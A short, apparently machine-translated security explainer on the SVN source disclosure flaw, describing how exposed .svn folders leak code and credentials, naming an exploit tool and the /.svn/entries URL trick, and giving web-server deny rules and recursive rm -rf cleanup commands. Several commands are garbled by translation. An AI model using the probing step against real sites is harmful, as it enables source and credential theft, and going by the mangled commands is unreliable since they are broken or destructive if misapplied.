SVN (Subversion) is the source code version management software, the main cause of the SVN source code vulnerability is the administrator operation is not standardized. "In the process of using SVN to manage local code, a hidden folder called. SVN is automatically generated, which contains important source code information. However, some site administrators do not want to use the ' export ' feature when publishing code, but instead directly copy the code folder to the Web server, which makes the. svn hidden folder exposed to the extranet environment, and hackers can take advantage of the ' entries ' files contained in the version information tracking to step through the site structure. (You can use the. svn/entries file to get the server source code, SVN server account password and other information)
The more serious problem is that SVN-generated. SVN directory also contains a copy of the source code file ending with. svn-base (the low version of SVN is the Text-base directory, the high version of SVN is the pristine directory), and if the server does not parse such suffixes, the hacker can directly obtain the file source.
Use
1. Exploit tool: Seay svn exploit tool
2. Add Site URL
Add/.svn/entries to the URL, list the site directory, and even download the entire station.
Repair
1, add a piece of code in the Web server configuration file, filter to the. svn file, return 404
Nginx Server:
Location ~ ^ (. *) \/\.svn\/
{
return 404;
}
Re-start Nginx
Apache Server:
Order Allow,deny
Deny from all
Restart Apache
2. Find all the. SVN hidden folders on the server, delete
The following command deletes the current directory under the. SVN folder
Find. -type d-name ". SVN" |xargs RM-RF
Rm-rf ' Find. -type d-name. SVN '
Find. -name ". SVN"-type D | Xargs RM-FR
Find. -name ". SVN"-type D | Xargs-n1 Rm-r
Use script to delete
#!/bin/sh
cd/home/web/
Find./-name ". SVN" |xargs-n1 echo >/dev/null 2>&1
Find./-name ". SVN"-print0 | xargs-0 RM-FR
If [$?-ne 0]; Then
echo "Remove. SVN dirs failed!"
Fi
Save the above file as. sh
After execution, all. SVN hidden folders in the/home/web directory and its subdirectories are deleted.
Defense
Developers strictly use the export feature when using SVN. Direct copying of code is prohibited.
SVN Source Disclosure Vulnerability